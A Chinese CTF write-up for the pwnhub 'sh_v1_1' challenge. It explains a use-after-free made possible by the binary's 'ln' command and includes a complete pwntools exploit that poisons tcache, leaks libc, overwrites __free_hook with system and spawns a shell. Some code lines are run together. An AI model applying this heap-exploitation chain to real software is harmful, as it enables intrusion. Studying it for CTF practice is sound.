【pwn】pwnhub 3月公开赛|PWN专场 sh_v1_1
【pwn】pwnhub 3月公开赛|PWN专场 sh_v1_1
逆向分析
本题的逆向难度说难也不难,说不难也挺难。如果不看一大堆bss段上的计算处理,那么其实非常的简单,一共就实现了7个功能,分别是:
-
touch(使用malloc申请一个chunk,同时可以写入0x208的数据)
-
gedit(能修改某个chunk的0x200的数据)
-
rm(free一个chunk,不存在uaf,但是可以配合ln完成类似uaf的操作)
-
ln(本题的漏洞点,如果在rm一个文件之前,奖一个文件ln了即将被删除的文件,那么这个文件仍然能被gedit,和cat)
-
cat(用于显示chunk中的数据)
-
cp(malloc一个chunk,复制内容进去,本人的wp中完全没用到这个?!)
-
ls(显示当前的所有文件,其实也没啥用)
解题思路
ln的操作能够在不malloc的情况下,将存储chunk信息、filename信息等信息的控制块的chunk地址字段,将其指定为被软连接的chunk的地址
由于free后存在置0的操作,所以假设file1被free了,那么file1就会从控制块中被删除置零
但是如果我们在free file1的操作前使用ln file1 file2,那么file2这个字段在控制块中即使file1被删除了,file2也不会删除,这就造成了uaf的操作
一旦能够使用uaf了,那么就使用打__free_hook为system然后free("/bin/sh\x00")的操作就能完成了
本人的具体操作是修改某个tcache的fd改位tcache的控制块,然后将控制块free获取libc基地址,再修改控制块让fd修改为__free_hook,再touch一次让__free_hook的位置写入system
最后执行free某个chunk内容为/bin/sh\x00的chunk就可以获取shell了
通过不断切换libc版本发现远程libc版本为2.31-0ubuntu9
完整exp如下:
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
# -----------------------------------
# @File : exp.py
# @Author : woodwhale
# @Time : 2023/03/11 13:39:10
# -----------------------------------#* https://github.com/Awoodwhale/pwn_all_in_one
from pwntools import *init("./sh_v1.1")io: tube = pwnio.io
elf: ELF = pwnio.elf
libc: ELF = pwnio.libccmd = lambda s: sla(">>>>", s)def add(filename, content="a"*8+"\n"):cmd(f"touch {filename}")s(content)def gedit(filename, content):cmd(f"gedit {filename}")s(content)def rm(filename):cmd(f"rm {filename}")def cat(filename):cmd(f"cat {filename}")def cp(file1, file2):cmd(f"cp {file1} {file2}")def ln(file1, file2):cmd(f"ln {file1} {file2}")add("wood1")
add("wood2")
add("null1")
add("null2")
add("/bin/sh", "/bin/sh\x00\n")ln("wood2", "wood3")rm("null1")
rm("wood2")ln("wood3", "wood4")
cat("wood4")tcache_base = leak(uu64(rl()) - 1728, "tcache_base")gedit("wood4", p64(tcache_base+0x10)+b"\n")
add("null4")
add("wood5", b"\x07"*8*14+b"\n")ln("wood5", "wood6")rm("wood5")cat("wood6")
main_arena = leak(l64(), "main_arena+96")
libc.address = leak(main_arena - (libc.sym["__malloc_hook"]+0x10+96), "libc_base")
free_hook = libc.sym["__free_hook"]
system_addr = libc.sym["system"]gedit("wood6", b"\x01"*8*14+p64(free_hook)*40+b"\n")add("woodwhale", p64(system_addr) + b"\n")rm("/bin/sh")
# dbg()ia()